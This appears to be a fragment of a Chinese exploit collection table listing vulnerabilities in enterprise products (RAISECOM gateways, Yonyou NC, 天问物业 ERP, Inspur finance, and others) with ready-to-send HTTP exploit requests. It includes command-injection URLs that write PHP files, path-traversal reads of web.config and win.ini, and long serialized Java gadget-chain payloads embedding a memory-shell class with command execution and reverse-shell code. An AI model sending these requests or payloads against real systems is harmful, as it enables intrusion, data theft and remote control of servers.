\x00N\x00!\x00e\x00\”\x00p\x00#\x00u\x00$\x00\x7d\x00%\x00\x88\x00&\x00\x93\x00’\x00\x98\x00\x28\x00\xa0\x00*\x00\xab\x00-\x00\xae\x00+\x00\xb0\x00,\x00\xc1\x00.\x00\xc6\x00/\x00\xce\x001\x00\xdc\x004\x00\xdf\x002\x00\xe1\x003\x00\xec\x005\x00\xf1\x006\x00\xf9\x007\x01\x04\x008\x01\x09\x009\x01\x17\x00:\x013\x00;\x01>\x00<\x01C\x00=\x01K\x00>\x01d\x00?\x01\x8a\x00@\x01\x8f\x00A\x01\x92\x00C\x01\x9d\x00D\x01\xc4\x00F\x01\xcc\x00G\x01\xd3\x00H\x02\x0e\x00I\x020\x00N\x023\x00J\x025\x00K\x02=\x00L\x02]\x00M\x02\x7f\x00O\x02\x82\x00S\x02\x85\x00Q\x02\x87\x00\x1d\x02\x8d\x00U\x00\x9b\x00\x00\x00\x04\x00\x01\x00/\x00\x01\x00\x9c\x00\x9d\x00\x03\x00\x99\x00\x00\x009\x00\x02\x00\x03\x00\x00\x00\x11+\xb8\x002\xb0M\xb8\x00\x02\xb6\x004+\xb6\x005\xb0\x00\x01\x00\x00\x00\x04\x00\x05\x003\x00\x01\x00\x9a\x00\x00\x00\x0e\x00\x03\x00\x00\x00_\x00\x05\x00`\x00\x06\x00a\x00\x9b\x00\x00\x00\x04\x00\x01\x003\x00\x9e\x00\x00\x00\x02\x00\x9f\x00\x01\x00\xa0\x00\xa1\x00\x01\x00\x99\x00\x00\x00\xff\x00\x04\x00\x04\x00\x00\x00\x9b+\xc6\x00\x0c\x126+\xb6\x007\x99\x00\x06\x128\xb0+\xb6\x009L+\x12:\xb6\x00;\x99\x00;*+\xb7\x00<\x12=\xb6\x00>M,\xbe\x05\x9f\x00\x06\x12?\xb0*,\x032\xb5\x00@*,\x042\xb8\x00A\xb8\x00’\xb5\x00B\xbb\x00CY*\xb7\x00DN-\xb6\x00E\x12F\xb0+\x12G\xb6\x00;\x99\x00\”*+\xb7\x00<\x12=\xb6\x00>M,\xbe\x05\x9f\x00\x06\x12H\xb0*,\x032,\x042\xb6\x00I\xb0+\x12J\xb6\x00;\x99\x00\x0d**+\xb7\x00<\xb6\x00K\xb0**+\xb7\x00<\xb6\x00K\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00R\x00\x14\x00\x00\x00k\x00\x0d\x00l\x00\x10\x00n\x00\x15\x00o\x00\x1e\x00q\x00\x29\x00r\x00/\x00s\x002\x00u\x009\x00v\x00F\x00w\x00O\x00x\x00S\x00y\x00V\x00z\x00_\x00\x7b\x00j\x00|\x00p\x00\x7d\x00s\x00\x7f\x00~\x00\x80\x00\x87\x00\x81\x00\x91\x00\x83\x00\x01\x00\xa2\x00\xa3\x00\x01\x00\x99\x00\x00\x00v\x00\x03\x00\x05\x00\x00\x006\xbb\x00LY+\xb7\x00MN\xbb\x00NY-\xb7\x00O:\x04\x19\x04,\xb8\x00P\xb6\x00Q\x19\x04\xb6\x00R\x19\x04\xb6\x00S\xa7\x00\x0b:\x04\x19\x04\xb6\x00T\xb0-\xb6\x00U\xb0\x00\x01\x00\x09\x00&\x00\x29\x00/\x00\x01\x00\x9a\x00\x00\x00&\x00\x09\x00\x00\x00\x8e\x00\x09\x00\x90\x00\x13\x00\x91\x00\x1c\x00\x92\x00!\x00\x93\x00&\x00\x96\x00\x29\x00\x94\x00+\x00\x95\x001\x00\x97\x00\x02\x00\xa4\x00\xa1\x00\x01\x00\x99\x00\x00\x00/\x00\x03\x00\x02\x00\x00\x00\x17+\x12:\x126\xb6\x00V\x12J\x126\xb6\x00V\x12G\x126\xb6\x00V\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x06\x00\x01\x00\x00\x00\xa0\x00\x01\x00\xa5\x00\xa1\x00\x01\x00\x99\x00\x00\x01\xc3\x00\x04\x00\x09\x00\x00\x01’\x12W\xb8\x00X\xb6\x00YM+\xb6\x009L\x01N,\x12Z\xb6\x00\x0c\x99\x00@+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12`\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12\”SY\x04\x12bSY\x05+S:\x04\xa7\x00=+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12c\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12dSY\x04\x12eSY\x05+S:\x04\xb8\x00f\x19\x04\xb6\x00gN\xbb\x00hY-\xb6\x00i\xb7\x00j\x12k\xb6\x00l:\x05\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126:\x06\xbb\x00hY-\xb6\x00o\xb7\x00j\x12k\xb6\x00l:\x05\xbb\x00]Y\xb7\x00^\x19\x06\xb6\x00_\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126\xb6\x00_\xb6\x00a:\x06\x19\x06:\x07-\xc6\x00\x07-\xb6\x00p\x19\x07\xb0:\x05\x19\x05\xb6\x00T:\x06-\xc6\x00\x07-\xb6\x00p\x19\x06\xb0:\x08-\xc6\x00\x07-\xb6\x00p\x19\x08\xbf\x00\x04\x00\x90\x00\xfb\x01\x06\x00/\x00\x90\x00\xfb\x01\x1a\x00\x00\x01\x06\x01\x0f\x01\x1a\x00\x00\x01\x1a\x01\x1c\x01\x1a\x00\x00\x00\x01\x00\x9a\x00\x00\x00j\x00\x1a\x00\x00\x00\xa9\x00\x09\x00\xaa\x00\x0e\x00\xab\x00\x10\x00\xad\x00\x19\x00\xae\x00+\x00\xaf\x00?\x00\xb1\x00V\x00\xb3\x00h\x00\xb4\x00|\x00\xb6\x00\x90\x00\xb9\x00\x99\x00\xba\x00\xab\x00\xbb\x00\xbf\x00\xbc\x00\xd1\x00\xbd\x00\xf7\x00\xbe\x00\xfb\x00\xc2\x00\xff\x00\xc3\x01\x03\x00\xbe\x01\x06\x00\xbf\x01\x08\x00\xc0\x01\x0f\x00\xc2\x01\x13\x00\xc3\x01\x17\x00\xc0\x01\x1a\x00\xc2\x01 \x00\xc3\x00\x01\x00\xa6\x00\xa7\x00\x01\x00\x99\x00\x00\x01r\x00\x04\x00\x0c\x00\x00\x00\xe2\x12W\xb8\x00X\xb6\x00Y\x12Z\xb6\x00\x0c\x9a\x00\x09\x12qN\xa7\x00\x06\x12rN\xb8\x00f-\xb6\x00s:\x04\xbb\x00tY+\x1c\xb7\x00u:\x05\x19\x04\xb6\x00i:\x06\x19\x04\xb6\x00o:\x07\x19\x05\xb6\x00v:\x08\x19\x04\xb6\x00w:\x09\x19\x05\xb6\x00x:\x0a\x19\x05\xb6\x00y\x9a\x00`\x19\x06\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x06\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x07\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x07\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x08\xb6\x00z\x9e\x00\x10\x19\x09\x19\x08\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x0a\xb6\x00\x7d\x19\x09\xb6\x00\x7d\x14\x00~\xb8\x00\x80\x19\x04\xb6\x00\x81W\xa7\x00\x08:\x0b\xa7\xff\x9e\x19\x04\xb6\x00p\x19\x05\xb6\x00\x82\xa7\x00 N\xbb\x00]Y\xb7\x00^\x12\x83\xb6\x00_-\xb6\x00\x84\xb6\x00_\x12\x85\xb6\x00_\xb6\x00a\xb0\x12\x86\xb0\x00\x02\x00\xa7\x00\xad\x00\xb0\x00/\x00\x00\x00\xbf\x00\xc2\x00/\x00\x01\x00\x9a\x00\x00\x00n\x00\x1b\x00\x00\x00\xd1\x00\x10\x00\xd2\x00\x16\x00\xd4\x00\x19\x00\xd6\x00\”\x00\xd7\x00-\x00\xd8\x00B\x00\xd9\x00P\x00\xda\x00X\x00\xdb\x00`\x00\xdc\x00m\x00\xde\x00u\x00\xdf\x00\x82\x00\xe1\x00\x8a\x00\xe2\x00\x97\x00\xe4\x00\x9c\x00\xe5\x00\xa1\x00\xe6\x00\xa7\x00\xe8\x00\xad\x00\xe9\x00\xb0\x00\xea\x00\xb2\x00\xeb\x00\xb5\x00\xed\x00\xba\x00\xee\x00\xbf\x00\xf1\x00\xc2\x00\xef\x00\xc3\x00\xf0\x00\xdf\x00\xf2\x00\x01\x00\xa8\x00\x98\x00\x01\x00\x99\x00\x00\x00-\x00\x03\x00\x01\x00\x00\x00\x11**\xb4\x00@*\xb4\x00B\xb6\x00\x87\xb6\x00\x88W\xb1\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x0a\x00\x02\x00\x00\x00\xf7\x00\x10\x00\xf8\x00\x09\x00\xa9\x00\xaa\x00\x01\x00\x99\x00\x00\x01\x1c\x00\x06\x00\x04\x00\x00\x00\xac\x01L\x12\x89\xb8\x002M,\x12\x8a\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x00C\x12\x8b\xb8\x002\x12\x8c\x03\xbd\x00\x1c\xb6\x00\x1d\x01\x03\xbd\x00\x1e\xb6\x00\x1fM,\xb6\x00\x04\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x004\x12\x8e\xb8\x002M,\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1dN-,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xb0\x00\x03\x00\x02\x00-\x000\x00/\x005\x00q\x00t\x00/\x00y\x00\xa6\x00\xa9\x00/\x00\x01\x00\x9a\x00\x00\x00F\x00\x11\x00\x00\x01\x00\x00\x02\x01\x02\x00\x08\x01\x03\x00-\x01\x06\x000\x01\x04\x001\x01\x07\x005\x01\x09\x00L\x01\x0a\x00q\x01\x0d\x00t\x01\x0b\x00u\x01\x0f\x00y\x01\x11\x00\x7f\x01\x12\x00\x8f\x01\x13\x00\xa6\x01\x16\x00\xa9\x01\x14\x00\xaa\x01\x18\x00\x01\x00\xab\x00\x00\x00\x02\x00\xact\x00\x0bdefineClassuq\x00~\x00\x1a\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x28sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x1a\x00\x00\x00\x00q\x00~\x00\x1cuq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00\x1esq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00q\x00~\x00\”uq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00$sq\x00~\x00\x0fsq\x00~\x00\x00w\x0c\x00\x00\x00\x10?@\x00\x00\x00\x00\x00\x00xsr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx”)}} |
| RAISECOM网关设备list_base_config.php存在远程命令执行漏洞 | GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo.php%60 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 |
| 竹云 信息泄露 | POST /admin-api/oauth/../admin/user/findlist Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Accept-Encoding:gzip, deflate Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection:close {“pagesize”:改个数,”pageNumber”:改个数,”userName”:””} |
| 天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞 | GET /HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞 | GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&pyFunc=system&pyArgu=执行的命令 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞 | GET /HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
| 宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞 | POST /zh-CN/PublicInterface/DownLoadServerFile HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate filePath=c:\windows\win.ini |
| 浪潮云财务系统xtdysrv.asmx存在命令执行漏洞 | POST /cwbase/service/rps/xtdysrv.asmx HTTP/1.1 Host: 106.38.42.250:8090 Content-Type: text/xml; charset=utf-8 Content-Length: 16398 SOAPAction: “http://tempuri.org/SavePrintFormatAssign” cmd: whoami <?xml version=”1.0″ encoding=”utf-8″?> |
| 瑞斯康达-多业务智能网关-RCE | GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3Bunlink%28__FILE__%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Ftest.php%60 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close |
| 用友NC及U8cloud系统接口LoggingConfigServlet存在反序列化漏洞 | POST /servlet/~ic/nc.bs.logging.config.LoggingConfigServlet HTTP/1.1 Host: Cmd: id Accept-Encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 {{unquote(“\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x03foosr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x07sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00*org.mozilla.javascript.DefiningClassLoader\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x01ur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\x16getDeclaredConstructoruq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x1asq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00t\x00\x0bnewInstanceuq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x18sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02t\x00\x02A4ur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x1b\xbb\xca\xfe\xba\xbe\x00\x00\x001\x01\x9a\x0a\x00\x1e\x00\xad\x0a\x00C\x00\xae\x0a\x00C\x00\xaf\x0a\x00\x1e\x00\xb0\x08\x00\xb1\x0a\x00\x1c\x00\xb2\x0a\x00\xb3\x00\xb4\x0a\x00\xb3\x00\xb5\x07\x00\xb6\x0a\x00C\x00\xb7\x08\x00\xa5\x0a\x00!\x00\xb8\x08\x00\xb9\x08\x00\xba\x07\x00\xbb\x08\x00\xbc\x08\x00\xbd\x07\x00\xbe\x0a\x00\x1c\x00\xbf\x08\x00\xc0\x08\x00\xc1\x07\x00\xc2\x0b\x00\x16\x00\xc3\x0b\x00\xc4\x00\xc5\x0b\x00\xc4\x00\xc6\x08\x00\xc7\x08\x00\xc8\x07\x00\xc9\x0a\x00\x1c\x00\xca\x07\x00\xcb\x0a\x00\xcc\x00\xcd\x08\x00\xce\x07\x00\xcf\x08\x00\xd0\x0a\x00\x8f\x00\xd1\x0a\x00!\x00\xd2\x08\x00\xd3\x09\x00\xd4\x00\xd5\x0a\x00\xd4\x00\xd6\x08\x00\xd7\x0a\x00\x8f\x00\xd8\x0a\x00\x1c\x00\xd9\x08\x00\xda\x07\x00\xdb\x0a\x00\x1c\x00\xdc\x08\x00\xdd\x07\x00\xde\x08\x00\xdf\x08\x00\xe0\x0a\x00\x1c\x00\xe1\x07\x00\xe2\x0a\x00C\x00\xe3\x0a\x00\xe4\x00\xd8\x08\x00\xe5\x0a\x00!\x00\xe6\x08\x00\xe7\x0a\x00!\x00\xe8\x08\x00\xe9\x0a\x00!\x00\xea\x0a\x00\x8f\x00\xeb\x08\x00\xec\x0a\x00!\x00\xed\x08\x00\xee\x09\x00\x8f\x00\xef\x0a\x00\xd4\x00\xf0\x09\x00\x8f\x00\xf1\x07\x00\xf2\x0a\x00C\x00\xf3\x0a\x00C\x00\xf4\x08\x00\xa6\x08\x00\xf5\x08\x00\xf6\x0a\x00\x8f\x00\xf7\x08\x00\xf8\x0a\x00\x8f\x00\xf9\x07\x00\xfa\x0a\x00L\x00\xfb\x07\x00\xfc\x0a\x00N\x00\xfd\x0a\x00\x8f\x00\xfe\x0a\x00N\x00\xff\x0a\x00N\x01\x00\x0a\x00N\x01\x01\x0a\x00/\x01\x02\x0a\x00L\x01\x03\x0a\x00!\x01\x04\x08\x01\x05\x0a\x01\x06\x01\x07\x0a\x00!\x01\x08\x08\x01\x09\x08\x01\x0a\x08\x01\x0b\x07\x01\x0c\x0a\x00]\x00\xad\x0a\x00]\x01\x0d\x08\x01\x0e\x0a\x00]\x01\x02\x08\x01\x0f\x08\x01\x10\x08\x01\x11\x08\x01\x12\x0a\x01\x13\x01\x14\x0a\x01\x13\x01\x15\x07\x01\x16\x0a\x01\x17\x01\x18\x0a\x00h\x01\x19\x08\x01\x1a\x0a\x00h\x01\x1b\x0a\x00h\x00\xc5\x0a\x00h\x01\x1c\x0a\x01\x17\x01\x1d\x0a\x01\x17\x01\x1e\x08\x01\x1f\x08\x01 \x0a\x01\x13\x01!\x07\x01\”\x0a\x00t\x01#\x0a\x00t\x01\x18\x0a\x01\x17\x01$\x0a\x00t\x01$\x0a\x00t\x01%\x0a\x01&\x01’\x0a\x01&\x01\x28\x0a\x01\x29\x01*\x0a\x01\x29\x01\x00\x05\x00\x00\x00\x00\x00\x00\x002\x0a\x00C\x01+\x0a\x01\x17\x01,\x0a\x00t\x01\x01\x08\x01-\x0a\x00/\x01.\x08\x01/\x08\x010\x0a\x00\xd4\x011\x0a\x00\x8f\x012\x08\x013\x08\x014\x08\x015\x08\x016\x08\x00\xa9\x08\x017\x07\x018\x01\x00\x0cBASE64_CHARS\x01\x00\x12Ljava/lang/String;\x01\x00\x0dConstantValue\x08\x019\x01\x00\x02ip\x01\x00\x04port\x01\x00\x13Ljava/lang/Integer;\x01\x00\x06<init>\x01\x00\x03\x28\x29V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x01\x00\x0aExceptions\x01\x00\x09loadClass\x01\x00%\x28Ljava/lang/String;\x29Ljava/lang/Class;\x01\x00\x09Signature\x01\x00\x28\x28Ljava/lang/String;\x29Ljava/lang/Class<*>;\x01\x00\x05proxy\x01\x00&\x28Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x05write\x01\x008\x28Ljava/lang/String;Ljava/lang/String;\x29Ljava/lang/String;\x01\x00\x0aclearParam\x01\x00\x04exec\x01\x00\x07reverse\x01\x00’\x28Ljava/lang/String;I\x29Ljava/lang/String;\x01\x00\x03run\x01\x00\x06decode\x01\x00\x16\x28Ljava/lang/String;\x29[B\x01\x00\x0aSourceFile\x01\x00\x07A4.java\x0c\x00\x97\x00\x98\x0c\x01:\x01;\x0c\x01<\x01=\x0c\x01>\x01?\x01\x00\x07threads\x0c\x01@\x01A\x07\x01B\x0c\x01C\x01D\x0c\x01E\x01F\x01\x00\x13[Ljava/lang/Thread;\x0c\x01G\x01H\x0c\x01I\x01J\x01\x00\x04http\x01\x00\x06target\x01\x00\x12java/lang/Runnable\x01\x00\x06this$0\x01\x00\x07handler\x01\x00\x1ejava/lang/NoSuchFieldException\x0c\x01K\x01?\x01\x00\x06global\x01\x00\x0aprocessors\x01\x00\x0ejava/util/List\x0c\x01L\x01M\x07\x01N\x0c\x01O\x01P\x0c\x01Q\x01R\x01\x00\x03req\x01\x00\x0bgetResponse\x01\x00\x0fjava/lang/Class\x0c\x01S\x01T\x01\x00\x10java/lang/Object\x07\x01U\x0c\x01V\x01W\x01\x00\x09getHeader\x01\x00\x10java/lang/String\x01\x00\x03cmd\x0c\x00\xa0\x00\xa1\x0c\x01X\x01Y\x01\x00\x09setStatus\x07\x01Z\x0c\x01[\x01\\\x0c\x01]\x01^\x01\x00$org.apache.tomcat.util.buf.ByteChunk\x0c\x00\x9c\x00\x9d\x0c\x01_\x01R\x01\x00\x08setBytes\x01\x00\x02[B\x0c\x01`\x01T\x01\x00\x07doWrite\x01\x00\x13java/lang/Exception\x01\x00\x13java.nio.ByteBuffer\x01\x00\x04wrap\x0c\x01a\x00\x9d\x01\x00 java/lang/ClassNotFoundException\x0c\x01b\x01c\x07\x01d\x01\x00\x00\x0c\x01e\x01f\x01\x00\x10command not null\x0c\x01g\x01H\x01\x00\x05#####\x0c\x01h\x01i\x0c\x00\xa4\x00\xa1\x01\x00\x01:\x0c\x01j\x01k\x01\x00\”command reverse host format error!\x0c\x00\x94\x00\x91\x0c\x01l\x01m\x0c\x00\x95\x00\x96\x01\x00\x10java/lang/Thread\x0c\x00\x97\x01n\x0c\x01o\x00\x98\x01\x00\x05$$$$$\x01\x00\x12file format error!\x0c\x00\xa2\x00\xa3\x01\x00\x05@@@@@\x0c\x00\xa5\x00\xa1\x01\x00\x0cjava/io/File\x0c\x00\x97\x01p\x01\x00\x18java/io/FileOutputStream\x0c\x00\x97\x01q\x0c\x00\xa9\x00\xaa\x0c\x00\xa2\x01r\x0c\x01s\x00\x98\x0c\x01t\x00\x98\x0c\x01u\x01H\x0c\x01v\x01H\x0c\x01w\x01x\x01\x00\x07os.name\x07\x01y\x0c\x01z\x00\xa1\x0c\x01\x7b\x01H\x01\x00\x03win\x01\x00\x04ping\x01\x00\x02-n\x01\x00\x17java/lang/StringBuilder\x0c\x01|\x01\x7d\x01\x00\x05 -n 4\x01\x00\x02/c\x01\x00\x05 -t 4\x01\x00\x02sh\x01\x00\x02-c\x07\x01~\x0c\x01\x7f\x01\x80\x0c\x00\xa5\x01\x81\x01\x00\x11java/util/Scanner\x07\x01\x82\x0c\x01\x83\x01\x84\x0c\x00\x97\x01\x85\x01\x00\x02\\a\x0c\x01\x86\x01\x87\x0c\x01Q\x01H\x0c\x01\x88\x01\x84\x0c\x01\x89\x00\x98\x01\x00\x07/bin/sh\x01\x00\x07cmd.exe\x0c\x00\xa5\x01\x8a\x01\x00\x0fjava/net/Socket\x0c\x00\x97\x01\x8b\x0c\x01\x8c\x01\x8d\x0c\x01\x8e\x01P\x07\x01\x8f\x0c\x01\x90\x01\x91\x0c\x01\x92\x01\x91\x07\x01\x93\x0c\x00\xa2\x01\x94\x0c\x01\x95\x01\x96\x0c\x01\x97\x01\x91\x01\x00\x1dreverse execute error, msg ->\x0c\x01\x98\x01H\x01\x00\x01!\x01\x00\x13reverse execute ok!\x0c\x01\x99\x01\x91\x0c\x00\xa6\x00\xa7\x01\x00\x16sun.misc.BASE64Decoder\x01\x00\x0cdecodeBuffer\x01\x00\x10java.util.Base64\x01\x00\x0agetDecoder\x01\x00&org.apache.commons.codec.binary.Base64\x01\x00\x02A4\x01\x00@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x01\x00\x0dcurrentThread\x01\x00\x14\x28\x29Ljava/lang/Thread;\x01\x00\x0egetThreadGroup\x01\x00\x19\x28\x29Ljava/lang/ThreadGroup;\x01\x00\x08getClass\x01\x00\x13\x28\x29Ljava/lang/Class;\x01\x00\x10getDeclaredField\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/reflect/Field;\x01\x00\x17java/lang/reflect/Field\x01\x00\x0dsetAccessible\x01\x00\x04\x28Z\x29V\x01\x00\x03get\x01\x00&\x28Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x07getName\x01\x00\x14\x28\x29Ljava/lang/String;\x01\x00\x08contains\x01\x00\x1b\x28Ljava/lang/CharSequence;\x29Z\x01\x00\x0dgetSuperclass\x01\x00\x08iterator\x01\x00\x16\x28\x29Ljava/util/Iterator;\x01\x00\x12java/util/Iterator\x01\x00\x07hasNext\x01\x00\x03\x28\x29Z\x01\x00\x04next\x01\x00\x14\x28\x29Ljava/lang/Object;\x01\x00\x09getMethod\x01\x00@\x28Ljava/lang/String;[Ljava/lang/Class;\x29Ljava/lang/reflect/Method;\x01\x00\x18java/lang/reflect/Method\x01\x00\x06invoke\x01\x009\x28Ljava/lang/Object;[Ljava/lang/Object;\x29Ljava/lang/Object;\x01\x00\x08getBytes\x01\x00\x04\x28\x29[B\x01\x00\x11java/lang/Integer\x01\x00\x04TYPE\x01\x00\x11Ljava/lang/Class;\x01\x00\x07valueOf\x01\x00\x16\x28I\x29Ljava/lang/Integer;\x01\x00\x0bnewInstance\x01\x00\x11getDeclaredMethod\x01\x00\x07forName\x01\x00\x15getContextClassLoader\x01\x00\x19\x28\x29Ljava/lang/ClassLoader;\x01\x00\x15java/lang/ClassLoader\x01\x00\x06equals\x01\x00\x15\x28Ljava/lang/Object;\x29Z\x01\x00\x04trim\x01\x00\x0astartsWith\x01\x00\x15\x28Ljava/lang/String;\x29Z\x01\x00\x05split\x01\x00’\x28Ljava/lang/String;\x29[Ljava/lang/String;\x01\x00\x08parseInt\x01\x00\x15\x28Ljava/lang/String;\x29I\x01\x00\x17\x28Ljava/lang/Runnable;\x29V\x01\x00\x05start\x01\x00\x15\x28Ljava/lang/String;\x29V\x01\x00\x11\x28Ljava/io/File;\x29V\x01\x00\x05\x28[B\x29V\x01\x00\x05flush\x01\x00\x05close\x01\x00\x08toString\x01\x00\x0fgetAbsolutePath\x01\x00\x07replace\x01\x00D\x28Ljava/lang/CharSequence;Ljava/lang/CharSequence;\x29Ljava/lang/String;\x01\x00\x10java/lang/System\x01\x00\x0bgetProperty\x01\x00\x0btoLowerCase\x01\x00\x06append\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/StringBuilder;\x01\x00\x11java/lang/Runtime\x01\x00\x0agetRuntime\x01\x00\x15\x28\x29Ljava/lang/Runtime;\x01\x00\x28\x28[Ljava/lang/String;\x29Ljava/lang/Process;\x01\x00\x11java/lang/Process\x01\x00\x0egetInputStream\x01\x00\x17\x28\x29Ljava/io/InputStream;\x01\x00\x18\x28Ljava/io/InputStream;\x29V\x01\x00\x0cuseDelimiter\x01\x00’\x28Ljava/lang/String;\x29Ljava/util/Scanner;\x01\x00\x0egetErrorStream\x01\x00\x